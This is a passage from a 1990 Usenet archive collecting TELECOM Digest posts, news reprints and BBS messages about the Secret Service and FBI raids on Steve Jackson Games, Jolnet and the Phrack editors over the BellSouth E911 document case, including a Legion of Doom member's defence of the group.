  2960. Organization: Capital Area Central Texas Unix Society, Austin, TX
  2961. Lines: 37
  2962. Approved: Telecom@eecs.nwu.edu
  2963. X-Submissions-To: telecom@eecs.nwu.edu
  2964. X-Administrivia-To: telecom-request@eecs.nwu.edu
  2965. X-Telecom-Digest: Volume 10, Issue 145, Message 6 of 6
  2966. ...I've just gotten a new update on the Mentor's recent apprehension by
  2967. the Feds. Thought you might like to hear something as close to as direct
  2968. from the Mentor as possible under the circumstances.
  2969.    From: Daneel Olivaw #96 @5283
  2970.    Date: Sun Mar 04 19:55:28 1990
  2971. I'll have to play the Mentor for now (with permission granted).
  2972. If you haven't heard the rumors, here is the truth.
  2973. The Mentor was awakened at 6:30am on Thursday (3/1/90) with the gun of
  2974. a Secret Service agent pointed at his head.  The SS proceded to search
  2975. and seize for the next 4 1/2 hours.  Things taken include an AT with
  2976. 80mb HD, HP LaserJet II, various documents, and other thing.  They
  2977. then proceded to raid his office at work, and sieze the computer and
  2978. laser printer there.  Lost in the shuffle was a complete novel (being
  2979. written and due in 2 weeks), and various other things.
  2980. Across town: Those of you who know Erik Bloodaxe, he was also
  2981. awakened, and his house searched.
  2982. Neither have been charged with anything, but they expect to at least
  2983. be called as witnesses at the case of the Phrack Boys (Knight
  2984. Lightning and Tarren King) in Chicago April 15.
  2985. Apparently, they did a shoddy job, as they tagged a book that Mentor
  2986. had borrowed from me (Quarterman's "The Matrix"), and then forgot to
  2987. take it, oh well....
  2988. It ain't lookin so lovely.  Also the UT computer systes are under
  2989. *VERY* close watch, as they were/are being hacked on by hackers around
  2990. the world, including some in Australia, and England.
  2991.                                                         OM
  2992. From: cosell@bbn.com (Bernie Cosell)
  2993. Newsgroups: comp.dcom.telecom
  2994. Subject: Keeping Copies of Illegal Things (was Re: Jolnet, Again)
  2995. Message-ID: <4725@accuvax.nwu.edu>
  2996. Date: 4 Mar 90 04:36:50 GMT
  2997. Sender: news@accuvax.nwu.edu
  2998. Organization: TELECOM Digest
  2999. Lines: 52
  3000. Approved: Telecom@eecs.nwu.edu
  3001. X-Submissions-To: telecom@eecs.nwu.edu
  3002. X-Administrivia-To: telecom-request@eecs.nwu.edu
  3003. X-Telecom-Digest: Volume 10, Issue 143, Message 3 of 8
  3004. }TELECOM Digest     Sat, 3 Mar 90 20:45:00 CST    Special: Jolnet, Again
  3005. This isn't misc.legal, and this isn't the time to be excessively picky
  3006. and critical, but:
  3007. }Here is how he told the tale of the '911 software':
  3008. }The software showed up on his system one day, almost two years ago. It
  3009. }came to him from netsys, where Len Rose was the sysadmin. According to
  3010. }Andrews, when he saw this file, and realized what it was, he knew the
  3011. }thing to do was to 'get it to the proper authorities as soon as
  3012. }possible',...
  3013. }ME> "After you passed it along to Boykin, did you then destroy the
  3014. }file and get it off your site?"
  3015. }RA> "Well, no... I kept a copy also."
  3016. It strikes me that this is a KEY faux pas, regardless of good
  3017. intentions or not.
  3018. }But then, said Andrews, a funny thing happened several months later.
  3019. }The folks at AT&T, instead of being grateful for the return of their
  3020. }software came back to Andrews to (in his words) 'ask for it again.'
  3021. }Somehow, they either never got it the first time; got it but suspected
  3022. }there were still copies of it out; or were just plain confused.
  3023. Just so, and if RA *supplied* another copy, I suspect they'd interpret
  3024. that as pretty convincing evidence that it WAS further distributed,
  3025. and with RA's knowledge.  I know that they didn't actually contact him
  3026. and ask/tell him to expunge all copies of the stuff, but his actions
  3027. clearly demonstrated his knowledge of just what it was he was messing
  3028. with, and I think they could easily show that he incurred an
  3029. obligation to act prudently with it, or else [just guessing now] he
  3030. could be liable to being an accessory after the fact.
  3031. }So he was contacted by the feds about a year ago, and it was at that
  3032. }point he decided it was in his best interest to cooperate with any
  3033. }investigation going on.
  3034. Perhaps his sudden cooperation was less out of pangs of conscience
  3035. that it might have appeared...  [not to besmirch his motives here,
  3036. only to point out that a call from the FBI pointing out that while you
  3037. may not have really DONE anything, your actions _could_ end up landing
  3038. you in court with some serious potential badness going down (and none
  3039. of this untested cheesiness about the the technicalities of bbs's and
  3040. such...  nice mainstream legal liability), could be pretty persuasive
  3041. at converting a concerned, but out-of-the-loop, citizen into an active
  3042. helper].
  3043.   /Bernie\
  3044. From: dattier@chinet.chi.il.us (David Tamkin)
  3045. Newsgroups: comp.dcom.telecom
  3046. Subject: Seizures Spreading
  3047. Message-ID: <4724@accuvax.nwu.edu>
  3048. Date: 4 Mar 90 05:55:20 GMT
  3049. Sender: news@accuvax.nwu.edu
  3050. Organization: TELECOM Digest
  3051. Lines: 15
  3052. Approved: Telecom@eecs.nwu.edu
  3053. X-Submissions-To: telecom@eecs.nwu.edu
  3054. X-Administrivia-To: telecom-request@eecs.nwu.edu
  3055. X-Telecom-Digest: Volume 10, Issue 143, Message 2 of 8
  3056. News is that Illuminati BBS, a system run by a company named Steve
  3057. Jackson Games somewhere in Texas, was also shut down and its equipment
  3058. seized by the federal government because two suspected Legion of Doom
  3059. members were among its users.
  3060. [Moderator's Note: And I suspect the raids will continue during the
  3061. next week or two. I wonder which sites will be next?  Each place they
  3062. raid, the local crackers point their fingers at each other like
  3063. naughty children, and to make themselves seem like the good guys they
  3064. say, "Have you talked to so-and-so yet?". Let's see now: netsys,
  3065. jolnet, attctc, illuminati, (your name here?)... Apparently even
  3066. getting rid of incriminating evidence won't work any longer, if
  3067. someone upstream of you tattled.  PT]
  3068. From: mosley@peyote.cactus.org (Bob Mosley III)
  3069. Newsgroups: comp.dcom.telecom
  3070. Subject: Austin, TX BBS Shut Down From Joinet Bust Fallout
  3071. Message-ID: <4723@accuvax.nwu.edu>
  3072. Date: 4 Mar 90 17:22:26 GMT
  3073. Sender: news@accuvax.nwu.edu
  3074. Organization: Capital Area Central Texas Unix Society, Austin, TX
  3075. Lines: 28
  3076. Approved: Telecom@eecs.nwu.edu
  3077. X-Submissions-To: telecom@eecs.nwu.edu
  3078. X-Administrivia-To: telecom-request@eecs.nwu.edu
  3079. X-Telecom-Digest: Volume 10, Issue 143, Message 1 of 8
  3080. This hit most BBS's in the Austin area on Thursday. It's believed
  3081. the bust came down Wednesday morning. In a nutshell, here's what
  3082. happened:
  3083. Wednesday morning, Feb. 28, the offices of Steve Jackson Games, inc.,
  3084. were raided by FBI and Secret Service officials. The establishment was
  3085. shit down, and all computer systems, including the Illuminati BBS,
  3086. were confiscated.
  3087. At that time, a 'retired' member of the LoD, who was identified as
  3088. 'The Mentor' was arrested. The charges reportedly are related to the
  3089. recent 911 bust that has shut down joinet and attatc (or whatever
  3090. Killerused to be called). His home system was confiscated, complete
  3091. with an entire collection of "Phrack" issues and related paraphanalia.
  3092. As of this writing, the Mentor is reportedly out on bail, sans system
  3093. and network connection. The Illuminati BBS is still down, although SJ
  3094. Games is back in operation, and no charges have been filed against any
  3095. of the employees other than The Mentor. The systems owned by SJ Games
  3096. have not been returned as of this writing.
  3097. Finally, rumors were trickling in early this morning (Saturday, 3/4)
  3098. that two BBS's in Dallas, three in Houston, and one in San Antonio
  3099. were busted by the same authorites in relation to the same case.
  3100. [in light of the Mentor's posted defense of the LoD, I kinda thought
  3101. you'd like to see this one! - OM]
  3102. From: telecom@eecs.nwu.edu (TELECOM Moderator)
  3103. Newsgroups: comp.dcom.telecom
  3104. Subject: Jolnet, Again
  3105. Message-ID: <4701@accuvax.nwu.edu>
  3106. Date: 4 Mar 90 02:45:00 GMT
  3107. Sender: news@accuvax.nwu.edu
  3108. Organization: TELECOM Digest
  3109. Lines: 350
  3110. Approved: Telecom@eecs.nwu.edu
  3111. X-Submissions-To: telecom@eecs.nwu.edu
  3112. X-Administrivia-To: telecom-request@eecs.nwu.edu
  3113. X-Telecom-Digest: Special: Jolnet, Again
  3114. TELECOM Digest     Sat, 3 Mar 90 20:45:00 CST    Special: Jolnet, Again
  3115. Today's Topics:                             Moderator: Patrick Townson
  3116.     Re: AT&T Sourcecode: Poison! (Chip Rosenthal)
  3117.     Jolnet Seizure (Mike Riddle)
  3118.     Article Regarding JOLNET/e911/LoD/Phrack (Ben Rooney)
  3119.     A Conversation With Rich Andrews (TELECOM Moderator)
  3120.     Killer/attctc Permanently Down (Charlie Boykin)
  3121. ----------------------------------------------------------------------
  3122. From: Chip Rosenthal <chip@chinacat.lonestar.org>
  3123. Subject: Re: AT&T Sourcecode: Poison!
  3124. Date: 3 Mar 90 00:00:00 GMT
  3125. Organization: Unicom Systems Development, Austin (yay!)
  3126. [Moderator's Note: Original date of 2/25 changed to prevent premature
  3127. expiration.  PT]
  3128. You've got a lot of nerve, Patrick.
  3129. telecom@eecs.nwu.edu (TELECOM Moderator) writes:
  3130. >We're told by a deep-throat type that AT&T is on the war path about
  3131. >their software [...] Like jolnet, netsys went down abruptly, with
  3132. >*everything* confiscated [...] Now comes news that attcdc [sic], formerly
  3133. >known as killer went off line in a hurry.....
  3134. Yessir, after all your complaints about that about anonymous Legion of
  3135. Doom message, this is a really crummy thing to post.  Based upon
  3136. unattributed conversations, you imply that Len Rose and Charlie Boykin
  3137. were involved in wrongdoing which lead to the shutdown of their
  3138. systems.
  3139. I don't know Len personally, but have had uucp connections with him in
  3140. the past.  Charlie, on the other hand, I do know personally.  He is
  3141. very well regarded in the Dallas/Fort Worth area, and was voted "1989
  3142. DFW Administrator of the Year" by the DFW lunch-bunch...errr....DFW
  3143. Association of Unix System Administrators.
  3144. You have cast some crummy aspersions towards these guys.  Since I know
  3145. them, I will wait for the facts to come in.  Others who don't know
  3146. them could very well jump to conclusions on the basis of this posting.
  3147. Was this message really called for?
  3148. Chip Rosenthal                            |  Yes, you're a happy man and you're
  3149. chip@chinacat.Lonestar.ORG                |  a lucky man, but are you a smart
  3150. Unicom Systems Development, 512-482-8260  |  man?  -David Bromberg
  3151. ------------------------------
  3152. Date: Wed, 28 Feb 90 21:38:39 EST
  3153. From: Mike Riddle <Mike.Riddle@p6.f666.n5010.z1.fidonet.org>
  3154. Subject: Jolnet Seizure
  3155. Reply-to: Mike.Riddle@p6.f666.n285.z1.fidonet.org
  3156. Organization: DRBBS Technical BBS, Omaha, Ne. 402-896-3537
  3157. Has anyone tried a novel legal approach to the case of equipment
  3158. seizure as "evidence"?  As I remember the Electronic Communications
  3159. Privacy Act, it contains specific procedures for authorities to obtain
  3160. copies/listings of data on a system (which system may have been used
  3161. for illegal purposes, but whose operator is not at the moment
  3162. charged).  From this I think a creative attorney could construct an
  3163. argument that the national policy was not to seize equipment, merely
  3164. to obtain all the information contained therein.  After all, it's the
  3165. data that caused any harm.
  3166. Also, the Federal Rules of Evidence, and most state rules, provide
  3167. that computer generated copies are "originals" for evidentiary
  3168. purposes.
  3169. I hope that someone close enough to the scene can keep us informed
  3170. about what is happening on this one.
  3171. {standard disclaimer goes here--don't pay any attention to me!}
  3172.    --- Ybbat (DRBBS) 8.9 v. 3.07 r.1
  3173.   * Origin: [1:285/666.6@fidonet] The Inns of Court, Papillion, NE  (285/666.6)
  3174.    --- Through FidoNet gateway node 1:16/390
  3175.    Mike.Riddle@p6.f666.n5010.z1.fidonet.org
  3176. ------------------------------
  3177. From: brooney@sirius.uvic.ca
  3178. Date:  3 Mar 90  2:36 -0800
  3179. Subject: Article Regarding JOLNET/e911/LoD/Phrack
  3180. The following is an article I received five days ago which contains, to my
  3181. knowledge, information as yet unpublished in comp.dcom.telecom regarding the
  3182. ongoing JOLNET/e911/LoD discussion.  It was printed in a weekly magazine
  3183. with a publishing date of Feb. 27 but other than that I have no exact idea
  3184. of when the events mentioned herein took place.
  3185.  - Ben Rooney
  3186. MISSOURI STUDENT PLEADS INNOCENT TO 911 CHARGES
  3187.  [Knight Lightning], a 19-year-old University of Missouri student, has
  3188. pleaded not guilty to federal allegations that he invaded the 911
  3189. emergency phone network for 9 states.
  3190.  As reported earlier, he was indicted this month along with [The Prophet],
  3191. 20, of Decatur, Ga.  Both are charged with interstate
  3192. transportation of stolen property, wire fraud, and violations of the
  3193. federal Computer Fraud and Abuse Act of 1986.
  3194.  Prosecutors contend the two used computers to enter the 911 system of
  3195. Atlanta's Bell South, then copied the program that controls and
  3196. maintains the system.  The stolen material later allegedly was
  3197. published on a computer bulletin board system operating in the Chicago
  3198. suburb of Lockport.  Authorities contend Neidorf edited the data for
  3199. an electronic publication known as "Phrack."
  3200.  According to Associated Press writer Sarah Nordgren, in a recent
  3201. hearing on the case Assistant U.S. Attorney William Cook was granted a
  3202. motion to prevent the 911 program from becoming part of the public
  3203. record during the trial.  U.S. District Judge Nicholas Bua set April
  3204. 16 for a trial.
  3205.  The 911 system in question controls emergency calls to police, fire,
  3206. ambulance and emergency services in cities in Alabama, Mississippi,
  3207. Georgia, Tennessee, Kentucky, Louisiana, North Carolina, South
  3208. Carolina and Florida.
  3209.                 ---------------------------------------
  3210.           Article from "A Networker's Journal" by Charles Bowen.
  3211.                     Info-Mat Magazine (Vol. 6, No. 2)
  3212. [Moderator's Note: {Info-Mat Magazine}, by the way, is the excellent
  3213. electronic journal distributed on many BBS machines throughout the
  3214. United States who are fortunate enough to be accepted as part of the
  3215. magazine's distribution network.  I personally wish it was distributed
  3216. on Usenet as well: it is well written and very informative.   PT]
  3217. ------------------------------
  3218. Date: Sat, 3 Mar 90 19:34:54 CST
  3219. From: TELECOM Moderator <telecom@eecs.nwu.edu>
  3220. Subject: A Conversation With Rich Andrews
  3221. After the first articles appeared here relating to the seizure of
  3222. Jolnet, and the indictment of some people for their part in the theft
  3223. of '911 software', I got various messages from other folks in
  3224. response. Some were published, while others were just personal
  3225. correspondence to me. One from Chip Rosenthal was held over, and is
  3226. included in this special issue today.
  3227. One writer, whose comments were attributed to 'Deep Throat' spent some
  3228. time on two occassions on the phone, in a conference call between
  3229. himself, David Tamkin and myself.
  3230. What was lacking in the several messages which appeared over the past
  3231. week were comments from Rich Andrews, system administrator of Jolnet.
  3232. I got one note from someone in Canada who said Andrews wanted to speak
  3233. with me, and giving a phone number where I could call Andrews at his
  3234. place of employment.
  3235. I put in a call there, with David Tamkin on the other line and had a
  3236. long discussion with Andrews, who was aware of David being on the line
  3237. with me.  I asked Andrews if he had any sort of net access available
  3238. to him at all -- even a terminal and modem, plus an account on some
  3239. site which could forward his mail to telecom. You see, I thought, and
  3240. still think it is extremely important to include Rich Andrews in any
  3241. discussion here.
  3242. He assured me he did have an account on a Chicago area machine, and
  3243. that a reply would be forthcoming within hours. I had a second
  3244. conversation with him the next morning, but without David on the line.
  3245. He again told me he would have a response to the several articles
  3246. written in the Digest ready and in the email 'very soon'.  This was on
  3247. Wednesday morning, and we estimated his message would be here sometime
  3248. later in the day -- certainly by midnight or so, when I am typically
  3249. working up an issue of the Digest.
  3250. Midnight came and went with no message. None showed up Thursday or
  3251. Friday.  I deliberatly withheld saying anything further in the hopes
  3252. his reply would be here to include at the same time. I guess at this
  3253. point we have to go on without him.
  3254. When David Tamkin and I talked to him the first time, on Tuesday
  3255. evening this past week, the first thing Andrews said to us, after the
  3256. usual opening greetings and chitchat was,
  3257.  "I've been cooperating with them for over a year now. I assume you
  3258. know that."
  3259. We asked him to define 'them'.  His response was that 'them' was the
  3260. United States Secret Service, and the Federal Bureau of Investigation.
  3261. He said this without us even asking him if he was doing so.
  3262. We asked him to tell us about the raid on his home early in February.
  3263. He said the agents showed up that Saturday afternoon with a warrant,
  3264. and took everything away as 'evidence' to be used in a criminal
  3265. prosecution.
  3266. ME> "If you have been working and cooperating with them for this long,
  3267. why did they take your stuff?"
  3268. RA> "They wanted to be sure it would be safe, and that nothing would be
  3269. destroyed."
  3270. ME> "But if you wanted to simply keep files safe, you could have taken
  3271. Jolnet off line for a few weeks/months by unplugging the modems from
  3272. the phone jacks, no? Then, plugged in a line when you wanted to call
  3273. or have a trusted person call you."
  3274. RA> "They thought it was better to take it all with them. It was mostly
  3275. for appearance sake. They are not charging me with anything."
  3276. ME> "Seems like a funny way to treat a cooperative citizen, at least
  3277. one who is not in some deep mess himself."
  3278. He admitted to us that several crackers had accounts on Jolnet, with
  3279. his knowledge and consent, and that it was all part of the investigation
  3280. going on ... the investigation he was cooperating in.
  3281. Here is how he told the tale of the '911 software':
  3282. The software showed up on his system one day, almost two years ago. It
  3283. came to him from netsys, where Len Rose was the sysadmin. According to
  3284. Andrews, when he saw this file, and realized what it was, he knew the
  3285. thing to do was to 'get it to the proper authorities as soon as
  3286. possible', so he chose to do that by transferring it to the machine
  3287. then known as killer, a/k/a attctc, where Charlie Boykin was the
  3288. sysadmin.
  3289. Andrews said he sent it to Boykin with a request that Boykin pass it
  3290. along to the proper people at AT&T.
  3291. ME> "After you passed it along to Boykin, did you then destroy the
  3292. file and get it off your site?"
  3293. RA> "Well, no... I kept a copy also."
  3294. ME> "Did Charlie Boykin pass it along to AT&T as you had requested?"
  3295. RA> "I assume he did."
  3296. But then, said Andrews, a funny thing happened several months later.
  3297. The folks at AT&T, instead of being grateful for the return of their
  3298. software came back to Andrews to (in his words) 'ask for it again.'
  3299. Somehow, they either never got it the first time; got it but suspected
  3300. there were still copies of it out; or were just plain confused.
  3301. So he was contacted by the feds about a year ago, and it was at that
  3302. point he decided it was in his best interest to cooperate with any
  3303. investigation going on.
  3304. Andrews pointed out that the '911 software' was really just ".... a
  3305. small part of what this is all about..."  He said there was other
  3306. proprietary information going around that should not be circulating.
  3307. He said also the feds were particularly concerned by the large number
  3308. of break-ins on computers which had occurred in the past year or so.
  3309. He said there have been literally "....thousands of attempts to break
  3310. into sites in the past year....", and part of his cooperation with the
  3311. authorities at this time dealt with information on that part of it.
  3312. We asked him about killer/attctc:
  3313. ME> "You knew of course that killer went off line very abruptly about
  3314. a week ago. What caused that? It happened a week or so after the feds
  3315. raided you that Saturday."
  3316. RA> "Well the official reason given by AT&T was lack of funds, but you
  3317. know how that goes...."
  3318. Now you'd think, wouldn't you, that if it was a funding problem -- if
  3319. you can imagine AT&T not having the loose change in its corporate
  3320. pocket it took to provide electrical power and phone lines to attctc
  3321. (Charlie got no salary for running it) -- that at least an orderly
  3322. transition would have taken place; i.e. an announcement to the net; an
  3323. opportunity to distribute new maps for mail and news distribution,
  3324. etc; and some forthcoming shut down date -- let's say March 1, or
  3325. April 1, or the end of the fiscal year, or something....
  3326. But oh, no...  crash boom, one day it is up, the next day it is gone.
  3327. ME> "What do you know about the temporary suspension of killer some
  3328. time ago? What was that all about?"
  3329. RA> "It was a security thing. AT&T Security was investigating Charlie
  3330. and some of the users then."
  3331. Andrews referred to the previous shutdown of killer as 'a real blunder
  3332. by AT&T', but it is unclear to me why he feels that way.
  3333. We concluded our conversation by Andrews noting that "there is a lot
  3334. happening out there right now."
  3335. He said the [Phrack] magazine distribution, via netsys, attctc and
  3336. jolnet was under close review. "One way to get them (crackers) is by
  3337. shutting down the sites they use to distribute stuff..."
  3338. And now, dear reader, you know everything I know on the subject. Well,
  3339. almost everything, anyway....
  3340.  From other sources we know that Len Rose of netsys was in deep
  3341. trouble with the law *before* this latest scandal.  How deep? Like he
  3342. was ready to leave the country and go to the other side of the world
  3343. maybe?  Like he was in his car driving on the expressway when they
  3344. pulled him over, stopped the car and placed him under arrest?  Deep
  3345. enough? This latest thing simply compounded his legal problems.
  3346. Patrick Townson
  3347. ------------------------------
  3348. Date: Fri Mar  2 06:59:23 1990
  3349. From: Charlie Boykin <cfb@sulaco.sigma.com>
  3350. Subject: Killer/attctc Is Permanently Down
  3351. Hello,
  3352.     Regarding a couple of things as well as a message from Bill Huttig.
  3353.     The system WAS shut down a couple of years ago - for three weeks -
  3354. as part of a security inquiry. It has been in continous operation
  3355. since. On July 4, 1989, it was moved to a Customer Demonstration
  3356. location at the Dallas Infomart and the node name changed to attctc
  3357. (for AT&T Customer Technology Center). The system was closed down on
  3358. February 20, 1990 after 5 years of operation. There are no charges
  3359. pending and the "management" of the system have been ostensibly
  3360. cleared of any illegal activities.
  3361.    As of now, there are no intentions of returning the system to
  3362. service.  There are hopeful plans and proposals that could conceivably
  3363. result in the system being placed back in service in a different
  3364. environment and under different management.
  3365.                                         Respectfully,
  3366.                                         Charles F. Boykin
  3367.                                         Formerly sysop\@attctc (killer)
  3368. ------------------------------
  3369. End of TELECOM Digest Special: Jolnet, Again
  3370. ******************************
  3371. ---------------
  3372. [reprinted without permission from the Feb. 12th, 1990 issue of Telephony]
  3373. ALLEGED HACKERS CHARGED WITH THEFT OF 911 DATA
  3374. Dawn Bushaus, Assistant Editor
  3375.      Four alleged computer hackers were indicted last week on charges that they
  3376. schemed to steal and publish proprietary BellSouth Corp. emergency data.  The
  3377. alleged activity could have produced disruptions in 911 networks nationwide,
  3378. according to federal officials.
  3379.      The case could raise new concerns about the security of local exchange
  3380. carriers' internal computer networks, which house data records on customers,
  3381. equipment and operations.
  3382.      "Security has always been a concern for the telephone companies," said
  3383. Peter Bernstein, an analyst with Probe Research.  "If you can crack the 911
  3384. system, what does that say about the operational support system or the billing
  3385. system?"
  3386.      A federal grand jury in Chicago handed down two indictments charging
  3387. [The Prophet], 20, of Decatur, Ga., and [Knight Lightning], 19, of
  3388. Chesterfield, Mo., with wire fraud, violations of the 1986 Computer Fraud Act
  3389. and interstate transportation of stolen property.
  3390.      Facing similar criminal charges in Atlanta are [The Urvile], 22, and
  3391. [The Leftist], 23.
  3392.      The four, alleged to be part of a closely knit group of hackers calling
  3393. themselves the Legion of Doom, reportedly participated in a scheme to steal the
  3394. BellSouth 911 data, valued at $80,000, and publish it in a hacker magazine
  3395. known as "Phrack."
  3396.      The Legion of Doom reportedly is known for entering telephone companies'
  3397. central office switches to reroute calls, stealing computer data and giving
  3398. information about accessing computers to fellow hackers.
  3399.      According to the Chicago indictment, XXXXX, also known as "The Prophet,"
  3400. stole a copy of the BellSouth 911 program by using a computer outside the
  3401. company to tap into the BellSouth computer.  Riggs then allegedly transferred
  3402. the data to a computer bulletin board in Lockport, Ill.
  3403.      XXXXXXX, also known as "Knight Lightning," reportedly downloaded the
  3404. information into his computer at the University of Missouri, Columbia, where he
  3405. edited it for publication in the hacker magazine, the indictment said.
  3406.      The indictment also charges that the hackers disclosed the stolen
  3407. information about the operation of the enhanced 911 system to other hackers so
  3408. that they could illegally access the system and potentially disrupt or halt
  3409. other systems across the country.
  3410.      The indictments followed a year-long investigation, according to U.S.
  3411. Attorney Ira Raphaelson.  If convicted, the alleged hackers face 31 to 32 years
  3412. in prison and $122,000 in fines.
  3413.      A BellSouth spokesman said the company's security system discovered the
  3414. intrusion, which occurred about a year ago, and the company then notified
  3415. federal authorities.
  3416.      Hacker invasion in the BellSouth network is very rare, the spokesman said,
  3417. adding that the company favors "stringent laws on the matter."
  3418.      The indictment solicited concern about the vulnerability of the public
  3419. network to computer hacking.
  3420. ----------------
  3421. From: MM02885@swtexas.bitnet
  3422. Newsgroups: comp.dcom.telecom
  3423. Subject: Re: Hacker Group Accused of Scheme Against BellSouth
  3424. Message-ID: <4153@accuvax.nwu.edu>
  3425. Date: 20 Feb 90 11:16:00 GMT
  3426. Sender: news@accuvax.nwu.edu
  3427. Organization: TELECOM Digest
  3428. Lines: 95
  3429. Approved: Telecom@eecs.nwu.edu
  3430. X-Submissions-To: telecom@eecs.nwu.edu
  3431. X-Administrivia-To: telecom-request@eecs.nwu.edu
  3432. X-Telecom-Digest: Volume 10, Issue 118, message 3 of 6
  3433.                <<< SYS$ANCILLARY:[NOTES$LIBRARY]GENERAL.NOTE;1 >>>
  3434.                             -< General Discussion >-
  3435. ==============================================================================
  3436. Note 155.6                 the MENTOR of the tree tops                  6 of 6
  3437. SWT::RR02026 "Ray Renteria [ F L A T L I N E ] "   89 lines  20-FEB-1990 00:18
  3438.                          -< Life, The Universe, & LOD >-
  3439. To set the record straight, a member of LOD who is a student in Austin
  3440. and who has had his computer account at UT subpoenaed by the DA out of
  3441. Chicago because of dealings with the above happenings:
  3442. My name is Chris, but to the computer world, I am Erik Bloodaxe.  I
  3443. have been a member of the group known as Legion of Doom since its
  3444. creation, and admittedly I have not been the most legitimate computer
  3445. user around, but when people start hinting at my supposed
  3446. Communist-backed actions, and say that I am involved in a world-wide
  3447. consipracy to destroy the nations computer and/or 911 network, I have
  3448. to speak up and hope that people will take what I have to say
  3449. seriously.
  3450. Frank, Rob and Adam were all definately into really hairy systems.
  3451. They had basically total control of a packet-switched network owned by
  3452. Southern Bell (SBDN)...through this network they had access to every
  3453. computer Southern Bell owned...this ranging from COSMOS terminals up
  3454. to LMOS front ends.  Southern Bell had not been smart enough to
  3455. disallow connections from one public pad to another, thus allowing
  3456. anyone who desired to do so, the ability to connect to, and seize
  3457. information from anyone else who was using the network...thus they
  3458. ended up with accounts and passwords to a great deal of systems.
  3459. This was where the 911 system came into play.  I don't know if this
  3460. system actually controlled the whole Southern Bell 911 network, or if
  3461. it was just a site where the software was being developed, as I was
  3462. never on it.  In any case, one of the trio ended up pulling files off
  3463. of it for them to look at.  This is usually standard proceedure: you
  3464. get on a system, look around for interesting text, buffer it, and
  3465. maybe print it out for posterity.  No member of LOD has ever (to my
  3466. knowledge) broken into another system and used any information gained
  3467. from it for personal gain of any kind...with the exception of maybe a
  3468. big boost in his reputation around the underground.  Rob took the
  3469. documentation to the system and wrote a file about it.  There are
  3470. actually two files, one is an overview, the other is a glossary.  (Ray
  3471. has the issue of PHRACK that has the files) The information is hardly
  3472. something anyone could possibly gain anything from except knowledge
  3473. about how a certain aspect of the telephone company works.
  3474. The Legion of Doom used to publish an electronic magazine called the
  3475. LOD Technical Journal.  This publication was kind of abandoned due to
  3476. laziness on our part.  PHRACK was another publication of this sort,
  3477. sent to several hundred people over the Internet, and distributed
  3478. widely on bulletin boards around the US.  Rob sent the files to PHRACK
  3479. for the information to be read.  One of PHRACK's editors, Craig,
  3480. happened to be the one who received the files.  If Rob had sent the
  3481. files to one address higher, Randy would have been the one who would
  3482. probably be in trouble.  In anycase, Craig, although he may have
  3483. suspected, really had no way to know that the files were propriatary
  3484. information and were stolen from a Southern Bell computer.
  3485. The three Atlanta people were busted after having voice and data taps
  3486. on their lines for 6 months.  The Phrack people were not busted, only
  3487. questioned, and Craig was indicted later.
  3488. What I don't understand is why Rob and Craig are singled out more
  3489. often than any other people.  Both of them were on probation for other
  3490. incidents and will probably end up in jail due to probation violations
  3491. now.  Frank and Adam still don't know what is going on with their
  3492. cases, as of the last time I spoke with them.
  3493. The whole bust stemmed from another person being raided and rolling
  3494. over on the biggest names he could think of to lighten his burden.
  3495. Since that time, Mr. William Cook, the DA in Chicago, has made it his
  3496. life's goal to rid the world of the scourge of LOD.  The three Atlanta
  3497. busts, two more LOD busts in New York, and now, my Subpoena.
  3498. People just can't seem to grasp the fact that a group of 20 year old
  3499. kids just might know a little more than they do, and rather than make
  3500. good use of us, they would rather just lock us away and keep on
  3501. letting things pass by them.  I've said this before, you cant stop
  3502. burglars from robbing you when you leave the doors unlocked and merely
  3503. bash them in the head with baseball bats when they walk in.  You need
  3504. to lock the door.  But when you leave the doors open, but lock up the
  3505. people who can close them for you another burglar will just walk right
  3506. in.
  3507. If anyone really wants to know anything about what is going on or just
  3508. wants to offer any opinions about all this directly to me, I'm
  3509. erikb@walt.cc.utexas.edu
  3510. but my account is being monitored so don't ask anything too explicit.
  3511. ->ME
  3512. -----------
  3513. Well, as some of you may already know, the people that put out Phrack were
  3514. busted recently.  Up until now, details were scarce, but things are starting to
  3515. appear in the news.
  3516. [reprinted without permission from the Milwaukee Journal Wed. Feb. 7th]
  3517.         Chicago, Ill. - AP - A computer hacker broke into the 911 emergency
  3518. telephone network covering nine states in the South and another intruder passed
  3519. on the access data to other hackers, authorities said.
  3520.         [The Prophet], 20, of Decatur, GA., and [Knight Lightning],
  3521. 19, of Chesterfield, MO., were indicted Tuesday by
  3522. a federal grand jury and accused of computer crimes, said acting US Atty. Ira
  3523. H. Raphaelson.
  3524.         He said Riggs was a member of the so-called Legion of Doom hackers
  3525. group, whose members are involved in numerous illegal activities.
  3526.         Riggs and two other alleged members also were indicted in Atlanta and
  3527. charged in other computer break-ins.
  3528.         The government would not say if any emergency calls were disrupted or
  3529. whether other damage was done during the tampering.
  3530. ------------
  3531. Name: The Prophet #104
  3532. Date: Tue Feb 06 23:55:15 1990
  3533. Imagine that you're deaf, dumb, blind, and paralyzed from the neck down and
  3534. totally unable to experience or communicate with the outside world.  How long
  3535. could you retain your sanity?  How many of you would choose to die instead?
  3536. How many of you think you could muster the willpower to create your own little
  3537. mental world to live in for the rest of your life, and how long do you think
  3538. the hospital would wait before putting you out of your misery?
  3539.   -The Prophet
  3540. ------------
  3541. Name: The Mentor #1
  3542. Date: Sat Jan 20 02:58:54 1990
  3543. Welp, Phrack magazine is dead. Those of you who pay attention to BITNET know
  3544. that the phrack accounts at U of M have been shut down. The story is as
  3545. follows...
  3546. Government agents (not sure of the dept., probably SS) have apparently been
  3547. monitoring the e-mail of the Phrack kids (Knight Lightning & Taran King) for
  3548. some time now. Apparently, a portion of a file sent to them (and subsequently
  3549. published) contained copyrighted information. This is all they needed. They
  3550. have now seized the entire Phrack net mailing list (over 500 accounts), plust
  3551. every piece of information that Randy & Craig have (and they have a *LOT*) on
  3552. real names, addresses and phone numbers.
  3553. This is evolving directly out of the busts of three LOD members (Urvile,
  3554. Leftist & Prophet). The Prophet (who is on probation) is apparently being
  3555. threatened with a prison term if he doesn't cooperate. We don't know for sure
  3556. if he cooperated or not, but what would you do in the same position?
  3557. The same officials are apparently *VERY* interested in our co-sys, Mr.
  3558. Bloodaxe. His net account is being watched, etc. I'll let him tell the story.
  3559. board only. I will be adding a secure (and I mean fucking secure) encryption
  3560. routine into the e-mail in the next 2 weeks - I haven't decided exactly how to
  3561. implement it, but it'll let two people exchange mail encrypted by a password
  3562. only know to the two of them. Hmmmm... carry this conversation to the
  3563. programming board.
  3564. Anyway, I do not think I am due to be busted, but then again, I don't do
  3565. anything but run a board. Still, there is that possibility. I assume that my
